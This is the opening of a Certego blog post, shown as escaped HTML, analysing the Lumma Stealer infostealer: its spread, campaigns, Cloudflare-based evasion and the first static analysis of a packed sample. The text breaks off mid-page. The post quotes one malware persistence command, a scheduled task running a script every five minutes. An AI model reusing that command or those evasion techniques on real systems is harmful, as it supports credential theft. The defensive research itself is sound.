      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAAC4jAAAuIwF4pT92AAAB10lEQVR42k1Ra2sTQRTd//9NUEyLwbQNhX5SpGq6mneySewm+8o+5j2z89iQUNqAIEgFb+wX4XC5c++cw8w5HuPqy3A+CVY9/3u4SbRtuDJIWEDFbUZMDsC2ZFZqp3RTUVdgK2ora+sxUfuD8SbZAvlHGGm7gylXsHZwA6C0k8oS6aiyyjRUugSbLTVUWg92hArCpFAGAFqUKy41poL/66FhUhWIVcQhZokCFbdlJz6Qbff65m3rvP3+onX2rnPR7Vx27/w+NJdX1+1O99Wbs87VzetWO8owqxssDOImo4ZJ4wllC2aiUmxyHpcsKlhaiRipuBLrnGdQozQvcYEoE5optz8cAAkxoAJkM4tpf838ezSNyGDNRhEbhqgfEj9ki5TW2hl7MHanTiYdluR3Wj83+wf42om8Wt0Hi+V0FgxHk8l0Pg8Ww+F4NgumMFqsguUmiqoCS167Xz+fvibPo+rP8fhEufZO3kpNuEJEVJinW5Rsyzgt8orEWZkVaBOnSZYXmEN44LBwjw+PR0ixZMYDZu/b+HNv8PHWny9D2+zB/9o0LxUA4QHgCPkBp2K6pLrihoBhkM1trw/kD5/uxtMV3HvJDF70f4VQauMkyNkdFjbGJ8P+AuBp9lLLZTIXAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Cover Lumma Stealer Certego&quot; title=&quot;&quot; src=&quot;/website/static/ee3024ad6d375f4153cfffd021c252db/71c1d/Cover-Lumma-Stealer-Certego.png&quot; srcset=&quot;/website/static/ee3024ad6d375f4153cfffd021c252db/804b2/Cover-Lumma-Stealer-Certego.png 384w,
/website/static/ee3024ad6d375f4153cfffd021c252db/e5715/Cover-Lumma-Stealer-Certego.png 768w,
/website/static/ee3024ad6d375f4153cfffd021c252db/71c1d/Cover-Lumma-Stealer-Certego.png 1536w,
/website/static/ee3024ad6d375f4153cfffd021c252db/a878e/Cover-Lumma-Stealer-Certego.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;</content:encoded></item><item><title><![CDATA[Malware Analysis - Inside Lumma Stealer]]></title><description><![CDATA[From Malware behavior to C2 communication decryption. Analysis conducted during the thesis project "TheTrackerShow"]]></description><link>https://www.certego.net/blog/lummastealer/</link><guid isPermaLink="false">lummastealer</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Malware]]></category><category><![CDATA[Malware Analysis]]></category><dc:creator><![CDATA[Federico Fantini]]></dc:creator><pubDate>Mon, 23 Jun 2025 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Author&lt;/strong&gt;: Federico Fantini&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Estimated reading time&lt;/strong&gt;: 30 minutes&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Reading tip&lt;/strong&gt;: Clicking on the image allows viewing it in full resolution for improved readability.&lt;/p&gt;
&lt;p&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Summary&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#introduction&quot;&gt;Introduction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#lumma-stealer-overview&quot;&gt;Lumma Stealer overview&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#global-threat&quot;&gt;Global Threat&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#record-growth&quot;&gt;Record growth&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#campaigns&quot;&gt;Campaigns&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#persistence&quot;&gt;Persistence&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#defense-evasion&quot;&gt;Defense evasion&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#telegram-as-marketplace-for-stolen-logs&quot;&gt;Telegram as marketplace for stolen logs&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#first-stage-analysis&quot;&gt;First stage analysis&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#static-analysis&quot;&gt;Static analysis&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#dynamic-analysis-and-process-un-hollowing&quot;&gt;Dynamic analysis and process &quot;un-hollowing&quot;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#injected-memory-analysis&quot;&gt;Injected memory analysis&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#communication-analysis-lumma-v4&quot;&gt;Communication analysis (lumma v4)&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#inetsim&quot;&gt;InetSim&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#proxy&quot;&gt;Proxy&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#summary-communication-flow&quot;&gt;Summary communication flow&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#actlife&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;act=life&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#actrecive_message&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;act=recive_message&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#actsend_message-there-are-multiple-requests&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;act=send_message&lt;/code&gt; &lt;strong&gt;(there are multiple requests)&lt;/strong&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#actget_message&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;act=get_message&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#analysis-of-communication-phases&quot;&gt;Analysis of communication phases&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#prerequisites-for-advanced-analysis&quot;&gt;Prerequisites for Advanced Analysis&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#second-stage-analysis&quot;&gt;Second stage analysis&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#identifying-the-decryption-routine&quot;&gt;Identifying the decryption routine&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#understanding-the-decryption-logic&quot;&gt;Understanding the Decryption Logic&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#reusing-the-c2-decryption-logic-in-communication-decryption&quot;&gt;Reusing the C2 Decryption Logic in Communication Decryption&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#analysis-of-decrypted-c2-responses&quot;&gt;Analysis of Decrypted C2 Responses&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#enrichment-of-the-analysis&quot;&gt;Enrichment of the analysis&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#dropped-file-decryption&quot;&gt;Dropped file decryption&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#data-exfiltration&quot;&gt;Data Exfiltration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#dynamic-retrieve-of-new-c2s&quot;&gt;Dynamic retrieve of new C2s&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#update-10012025-changed-hardcoded-domains-decryption&quot;&gt;Update 10/01/2025: Changed hardcoded domains decryption&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#introduction-1&quot;&gt;Introduction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#dynamic-analysis&quot;&gt;Dynamic analysis&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#identifying-the-decryption-routine-1&quot;&gt;Identifying the decryption routine&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#understanding-the-decryption-logic-1&quot;&gt;Understanding the Decryption Logic&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#salsa20-and-chacha20&quot;&gt;Salsa20 and Chacha20&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#chacha20-proof&quot;&gt;Chacha20 proof&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#update-06032025-changed-communication-protocol--lumma-v63&quot;&gt;Update 06/03/2025: Changed communication protocol = lumma v6.3&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#introduction-2&quot;&gt;Introduction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#retrieve-configuration-and-commands&quot;&gt;Retrieve configuration and commands&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#exfiltrate-stolen-data&quot;&gt;Exfiltrate stolen data&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#update-01042025-strings-encryption&quot;&gt;Update 01/04/2025: Strings encryption&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#retrieved-configuration-strings-are-also-encrypted&quot;&gt;Retrieved configuration strings are also encrypted&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#dropped-file-decryption-1&quot;&gt;Dropped file decryption&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#lumma-stealer-seen-from-the-certego-perspective&quot;&gt;Lumma Stealer seen from the Certego perspective&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#a-personal-consideration&quot;&gt;A personal consideration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#final-remarks&quot;&gt;Final Remarks&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;h1&gt;&lt;a id=&quot;introduction&quot;&gt;&lt;/a&gt;Introduction&lt;/h1&gt;
&lt;p&gt;This analysis served as a practical testbed at Certego to evaluate a well-established technique: emulating the network behavior of malware in order to impersonate an infected machine from the perspective of the C2 infrastructure. Within the scope of my thesis project, TheTrackerShow, the knowledge acquired through the analysis of Lumma Stealer’s communication protocol proved essential for the design and development of an automated framework. This system is capable of continuously interacting with malicious servers, monitoring ongoing campaigns, and generating statistical visualizations to support threat intelligence activities.&lt;/p&gt;
&lt;p&gt;&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;h1&gt;&lt;a id=&quot;lumma-stealer-overview&quot;&gt;&lt;/a&gt;Lumma Stealer overview&lt;/h1&gt;
&lt;p&gt;In recent years, the evolution of Malware-as-a-Service (MaaS) has made cybercrime increasingly accessible, which contributed to the spread of infostealers like Lumma Stealer (or Lumma C2). Introduced in 2022, Lumma has quickly gained popularity in underground forums due to its ease of use and continuous updates by its developers, with prices ranging from $250 to $20,000.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/04/21040847/lumma-fake1.png&quot;&gt;
&lt;/div&gt;
&lt;h2&gt;&lt;a id=&quot;global-threat&quot;&gt;&lt;/a&gt;Global Threat&lt;/h2&gt;
&lt;p&gt;Lumma Stealer has rapidly emerged as a widespread cyber threat, active across continents and industry sectors. Its modular architecture, availability as a Malware-as-a-Service (MaaS), and sophisticated evasion techniques have contributed to its global proliferation, making it one of the most active info-stealers in recent years.&lt;/p&gt;
&lt;p&gt;Several sources document its geographical impact. According to &lt;a href=&quot;https://www.netskope.com/blog/lumma-stealer-fake-captchas-new-techniques-to-evade-detection&quot;&gt;Netskope&lt;/a&gt;, large-scale campaigns have been observed in Argentina, Colombia, the United States, and the Philippines, with a particular focus on the telecommunications sector. Similarly, &lt;a href=&quot;https://www.eset.com/blog/en/business-topics/threat-landscape/lumma-stealer-a-fast-growing-infostealer-threat/&quot;&gt;ESET&lt;/a&gt; telemetry recorded a sharp increase in detections across Peru, Poland, Spain, Mexico, and Slovakia, showing a strong presence in Latin America and Eastern Europe.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.microsoft.com/en-us/security/blog/2025/05/21/lumma-stealer-breaking-down-the-delivery-techniques-and-capabilities-of-a-prolific-infostealer&quot;&gt;Microsoft&lt;/a&gt; published a global heatmap highlighting significant infection rates across North America, Western Europe, and parts of Asia, confirming Lumma’s global footprint.&lt;/p&gt;
&lt;p&gt;On a national level, &lt;a href=&quot;https://cert-agid.gov.it/news/report-riepilogativo-sulle-tendenze-delle-campagne-malevole-analizzate-dal-cert-agid-nel-2024/&quot;&gt;CERT-AgID&lt;/a&gt; confirmed that Lumma Stealer was actively distributed in Italy throughout 2024. The campaigns primarily relied on phishing emails containing malicious attachments or compressed archives, highlighting the malware&apos;s adaptability to the Italian threat landscape as well.&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;record-growth&quot;&gt;&lt;/a&gt;Record growth&lt;/h2&gt;
&lt;p&gt;As reported in &lt;a href=&quot;https://web-assets.esetstatic.com/wls/en/papers/threat-reports/eset-threat-report-h22024.pdf&quot;&gt;ESET&apos;s second half of 2024 report&lt;/a&gt;, Lumma Stealer recorded a 369% distribution increase compared to the previous half-year, reaching almost 50&apos;000 detections in 2024, which made it one of the ten most detected infostealers by ESET products.&lt;/p&gt;
&lt;p&gt;Furthermore in the &lt;a href=&quot;https://any.run/cybersecurity-blog/malware-trends-2024/&quot;&gt;Any.run annual 2024 report&lt;/a&gt; we see how Lumma Stealer leads the way with 12&apos;655 detections, a newcomer compared to 2023, highlighting its rapid rise in the cyber threat landscape.&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;campaigns&quot;&gt;&lt;/a&gt;Campaigns&lt;/h2&gt;
&lt;p&gt;Lumma Stealer campaigns are characterized by deceptive and constantly evolving distribution tactics designed to steal sensitive user data. The main distribution methods include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://securelist.com/lumma-fake-captcha-attacks-analysis/116274/&quot;&gt;Fake CAPTCHA Pages&lt;/a&gt;: Users are redirected to fake CAPTCHA pages that execute PowerShell commands under the guise of human verification, resulting in malware download. These pages often appear on compromised websites or via malvertising&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.eset.com/blog/en/business-topics/threat-landscape/lumma-stealer-a-fast-growing-infostealer-threat/&quot;&gt;Phishing Emails&lt;/a&gt;: Traditional phishing tactics that lure users into opening malicious attachments or clicking links to malware-hosting sites&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.picussecurity.com/resource/blog/lumma-infostealer-continues-its-github-social-engineering-campaign&quot;&gt;Spear Phishing via GitHub&lt;/a&gt;: Attackers impersonate GitHub’s security team, sending fake alerts or posting bogus fixes in repository comments. The links point to ZIP files containing the malware&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.fortinet.com/blog/threat-research/lumma-variant-on-youtube&quot;&gt;Cracked Software&lt;/a&gt;: Lumma has been distributed through pirated software, targeting users looking for unauthorized or free applications&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;a id=&quot;persistence&quot;&gt;&lt;/a&gt;Persistence&lt;/h2&gt;
&lt;p&gt;As reported by &lt;a href=&quot;https://www.picussecurity.com/resource/blog/lumma-infostealer-continues-its-github-social-engineering-campaign&quot;&gt;picussecurity&lt;/a&gt;, uses of persistence mechanisms have been highlighted, especially when implemented together with other malware such as loaders or RATs. Although Lumma Stealer itself often follows a grab-and-go model (executing quickly and exfiltrating data in one shot), more advanced operations aim to maintain long-term access to infected systems.&lt;/p&gt;
&lt;p&gt;Two main persistence techniques have been observed:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Startup Folder Abuse&lt;/strong&gt;: the malware creates an &lt;code class=&quot;language-text&quot;&gt;.url&lt;/code&gt; shortcut file in the Windows Startup folder. These point to JavaScript files (e.g., &lt;code class=&quot;language-text&quot;&gt;HealthPulse.js&lt;/code&gt;) that are executed automatically via &lt;code class=&quot;language-text&quot;&gt;mshta.exe&lt;/code&gt; when the user logs in.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scheduled Tasks&lt;/strong&gt;: the malware sets scheduled tasks. One example is a task named &quot;Lodging&quot;, configured to run a JavaScript script (e.g., &lt;code class=&quot;language-text&quot;&gt;Quantifyr.js&lt;/code&gt;) every five minutes using &lt;code class=&quot;language-text&quot;&gt;wscript.exe&lt;/code&gt;:
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bat&quot;&gt;&lt;pre class=&quot;language-bat&quot;&gt;&lt;code class=&quot;language-bat&quot;&gt;  schtasks /create /tn &amp;quot;Lodging&amp;quot; /tr &amp;quot;wscript.exe Quantifyr.js&amp;quot; /sc minute /mo 5&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Lumma Stealer often runs once without persistence, but when bundled with RATs or loaders, attackers can maintain access and redeploy it as needed. In general defenders should scrutinize unusual startup entries or scheduled tasks, which may signal an ongoing infection.&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;defense-evasion&quot;&gt;&lt;/a&gt;Defense evasion&lt;/h2&gt;
&lt;p&gt;As reported by &lt;a href=&quot;https://www.bitsight.com/blog/lumma-stealer-is-out-of-business&quot;&gt;bitsight&lt;/a&gt;, Lumma Stealer operators leveraged Cloudflare services to mask the source IP addresses of their C2 servers. This type of obfuscation makes it difficult for defenders to track and block malicious infrastructure.&lt;/p&gt;
&lt;p&gt;The use of cloudflare offers several tactical advantages for threat actors, here are a few:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;DDoS protection&lt;/strong&gt;: the C2 backend is “shielded” behind the Cloudflare infrastructure, so any overload attempts by researchers or automated countermeasures are mitigated by Cloudflare’s reverse proxy.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real IP obfuscation&lt;/strong&gt;: the real IP addresses of the C2 servers are not visible to researchers, they only have access to the IPs of Cloudflare nodes (e.g. &lt;code class=&quot;language-text&quot;&gt;104.x.x.x&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;172.x.x.x&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automatic blocking of suspicious traffic&lt;/strong&gt;: Cloudflare can block or filter requests from TOR, VPN, or known malicious IPs. In these cases, interactive challenges are requested (e.g. CAPTCHA or Turnstile) that hinder automated crawling and reverse engineering tools.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;From a threat actor’s point of view, this means being able to filter automatic analyses performed by sandboxes and crawlers through proxies and, above all, being able to improve the survivability of their servers by limiting access to only “legitimate victims”, i.e. those who have actually contracted the malware.&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;telegram-as-marketplace-for-stolen-logs&quot;&gt;&lt;/a&gt;Telegram as marketplace for stolen logs&lt;/h2&gt;
&lt;p&gt;Telegram is widely used by Lumma Stealer operators to sell stolen credentials through dedicated channels and bots. As highlighted by &lt;a href=&quot;https://socradar.io/top-stealer-log-telegram-channels&quot;&gt;SOCRadar&lt;/a&gt;, these platforms offer searchable access to logs, subscription tiers, and automated delivery of fresh data. This transforms Telegram into a ready-made black market for infostealer output, streamlining the monetization of compromised accounts.&lt;/p&gt;
&lt;p&gt;&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;h1&gt;&lt;a id=&quot;first-stage-analysis&quot;&gt;&lt;/a&gt;First stage analysis&lt;/h1&gt;
&lt;p&gt;The initial technical analysis focused on a sample of Lumma Stealer retrieved from the &lt;a href=&quot;https://bazaar.abuse.ch/sample/007310a11e7dfdb4fa9dd2e216f92cda9a1954c7be76a33aaf8028206a0c0258/&quot;&gt;MalwareBazaar&lt;/a&gt; platform.&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;static-analysis&quot;&gt;&lt;/a&gt;Static analysis&lt;/h2&gt;
&lt;p&gt;As shown in the following image, the import table includes several suspicious functions, of which related to reconnaissance. However, their limited presence suggests that much of the functionality may be hidden. This is supported by the presence of a high-entropy section named &lt;code class=&quot;language-text&quot;&gt;.open&lt;/code&gt;, which strongly indicates the use of packing or obfuscation techniques. High entropy is commonly associated with compressed or encrypted code, often employed to hinder static analysis and conceal malicious behavior.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1255px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/76088b0a5b05265a538e6b7a0e32b07e/553fd/static%20analysis%20-%20PE%20Studio.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 63.28125%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAIAAAAmMtkJAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB4UlEQVR42mVSDW/bIBD1//9ZSzVVW9ROXbaqie04sWP8HRswGAx4z7jqqu2E0B3cu3vvIAjD8HA4EEKWZZlnjWWM0Vpba7w/Y/0NrTHTpMvK1JVjLKi9JXFKbk16uV2SvCD1ObqSHGGW+hC3BWmS+JrlDTmG1+d9fiHyeg0YpeiZkIK0NG+6c161VIRZXt7HrGoTUndMnNK8oTLJy7Sh9S2NTo8ln1VZBef4zDh7TruHpNvndBfWTwV/iNtvWb+/0V1U/2zkl1P1VLDvab9Luh9x/XV3eHxJ7kkWvL4eoyjWEDvbeYYwq1fV1loHg+PcYuZ1h/nQWaW1UM7YIMvVYo2mXM966Hs1TZQO02pSCoENZYZhEGLE2HCyVrSmLAvOeRBGo2CTGyVK83FEqhACNIAWUsLx/c1GRimFHRSqqmKY9q/fQo7G8bUkZwxJ47g2QWc4KITsDQmTngjAZVEyyoKXl+PbWwitONouNrnvor3Wz87ibZ2QtQFjw/3eoYNRWrLRT26GcuSBGCjA6e89VCz/WYAGyGaMO6nUwPGhwAK78ySBAR4kMR63uI/OH2C8jaaMLiuYzf5vArYx9+SXNE0JKT7TfgevScYwFJ6UGaX1GEx1EwYeSGjbFq8F/x/afwAdbudb0fjPawAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;static analysis - PE Studio&quot; title=&quot;&quot; src=&quot;/website/static/76088b0a5b05265a538e6b7a0e32b07e/553fd/static%20analysis%20-%20PE%20Studio.png&quot; srcset=&quot;/website/static/76088b0a5b05265a538e6b7a0e32b07e/804b2/static%20analysis%20-%20PE%20Studio.png 384w,
/website/static/76088b0a5b05265a538e6b7a0e32b07e/e5715/static%20analysis%20-%20PE%20Studio.png 768w,
/website/static/76088b0a5b05265a538e6b7a0e32b07e/553fd/static%20analysis%20-%20PE%20Studio.png 1255w&quot; sizes=&quot;(max-width: 1255px) 100vw, 1255px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;p&gt;As visible in the next image, the &lt;code class=&quot;language-text&quot;&gt;.open&lt;/code&gt; section appears unusually &lt;strong&gt;uniform&lt;/strong&gt; and exhibits &lt;strong&gt;very high entropy&lt;/strong&gt;, a clear indication of obfuscation or compression. Even the &lt;code class=&quot;language-text&quot;&gt;.text&lt;/code&gt; section shows signs of being affected by packing techniques. The visual structure suggests that a large portion (about 92%) of the binary is packed, making static analysis and advanced static analysis inefficient at this stage. In such cases, dynamic analysis or unpacking is generally required to expose the underlying malicious behavior.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 707px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/2236c1d0ab165463b58bf5c9cbc5d4f1/394f7/static%20analysis%20-%20Detect%20It%20Easy.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 89.0625%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAIAAADUsmlHAAAACXBIWXMAAAsTAAALEwEAmpwYAAACW0lEQVR42oWSy27bMBBF9f+rdlGgCbrsF3RZILGTOrHRwMkiiGXJ1Ms2KUoiRer9tNyR1Do1ErSDA+qOOFcDkaMchyjLMs+S7tC0TdXUJdA25aCr7nA4MUTbdd3oUsYH5PbWUPWVYWimqTHmMk6jmNdtcSqFAGtRFu2hPTNDpIwLQisuulB0UXzgIYhjmh2TpCdNj1J2WdY2bXf407mCqJskK4qiKosqBZWXcZRkWQHkI3nZ0wsoKvu8gmelCB7crd0PE/z53r+YB59m9HLBPk7xl0XwdcngzcW8Xy9h6459e2aMc91wkLXFmCjMo8z3IggpOWdSiEiKJI6hY56l2TlFntZFWhVZlSdlniqPZnCj0tnanenBD9W9WZHpyr1dkZ+WWJhyYUUn5gP3ZjQ3o5kRPe+kgnbeUrWfNEfH/HFtP7ygpWo9vBiPqo1cgWW1F+UIlvVJ70RJRaYsbXGlsqnGJrqYavxWY9drdq0GE41PN9EUJSOTTfx9FYz6BiVXm+RpGytSyLpp2rZtxrUX7ZC2dd38pmlgijyK+5up62oADlzBmFoW2TrUecN2AITvM2zhHZSZ2EF7nwZCCjhiZb8l+spB6x1ab4f1HNVBK8fbU9sgmw0xkKvrhFIGdxPHsbLf0w0ihknfx3CR4fr2zrF6ASl8wvNezZBjY9h4F2RQb+c65qv57859/i8zcmGO4M9BvDXT/3QGs8cdx3vXDGewR4gMdaTHIGcpIq7LbJuOejRLKXqz7EdaBkGIsQtzTakPhKGElLEQAAG3EvgMzgkKCKFhCDclQh7+AsL30t6I77LQAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;static analysis - Detect It Easy&quot; title=&quot;&quot; src=&quot;/website/static/2236c1d0ab165463b58bf5c9cbc5d4f1/394f7/static%20analysis%20-%20Detect%20It%20Easy.png&quot; srcset=&quot;/website/static/2236c1d0ab165463b58bf5c9cbc5d4f1/804b2/static%20analysis%20-%20Detect%20It%20Easy.png 384w,
/website/static/2236c1d0ab165463b58bf5c9cbc5d4f1/394f7/static%20analysis%20-%20Detect%20It%20Easy.png 707w&quot; sizes=&quot;(max-width: 707px) 100vw, 707px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;p&gt;The &lt;code class=&quot;language-text&quot;&gt;.open&lt;/code&gt; section lacks any meaningful code references, apart from a pointer in the PE header. Again this behavior is typical of packed binaries, where custom sections are mapped but only accessed during runtime unpacking.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 674px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/25a24392bc56fea9a1db3960aabb1e0e/fdaf8/advanced%20static%20analysis%20-%20Ghidra%201.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
